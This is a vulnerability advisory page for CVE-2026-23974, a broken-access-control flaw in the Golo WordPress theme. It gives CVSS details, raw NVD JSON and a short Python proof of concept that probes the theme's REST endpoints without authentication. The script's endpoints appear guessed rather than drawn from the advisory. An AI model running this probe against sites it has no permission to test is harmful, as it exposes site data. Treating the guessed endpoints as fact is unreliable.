Security Vulnerability Report
中文
CVE-2026-23974 CVSS 5.3 MEDIUM

CVE-2026-23974

Published: 2026-01-22 17:16:38
Last Modified: 2026-04-28 16:16:08

Description

Missing Authorization vulnerability in uxper Golo golo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Golo: from n/a through < 1.7.5.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Golo Theme < 1.7.5
Golo Theme from n/a through < 1.7.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-23974 PoC - Golo Theme Authorization Bypass # Affected: Golo Theme < 1.7.5 import requests import sys TARGET_URL = "http://target-site.com" VULN_ENDPOINT = "/wp-json/golo/v1/" def check_vulnerability(): """Check if target is vulnerable to CVE-2026-23974""" headers = { "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-23974-PoC)" } # Test unauthorized access to protected endpoint endpoints_to_test = [ "users", "listings", "bookings", "settings" ] print("[*] Testing for Missing Authorization vulnerability...") for endpoint in endpoints_to_test: url = f"{TARGET_URL}{VULN_ENDPOINT}{endpoint}" try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint} - No auth required") print(f" Status: {response.status_code}") print(f" Response: {response.text[:200]}...") elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: {endpoint} - Requires authorization") else: print(f"[*] Unknown: {endpoint} - Status {response.status_code}") except requests.RequestException as e: print(f"[!] Error testing {endpoint}: {e}") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23974", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:38.090", "lastModified": "2026-04-28T16:16:07.900", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in uxper Golo golo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Golo: from n/a through < 1.7.5."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en uxper Golo golo permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Golo: desde n/a hasta &lt; 1.7.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/golo/vulnerability/wordpress-golo-theme-1-7-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}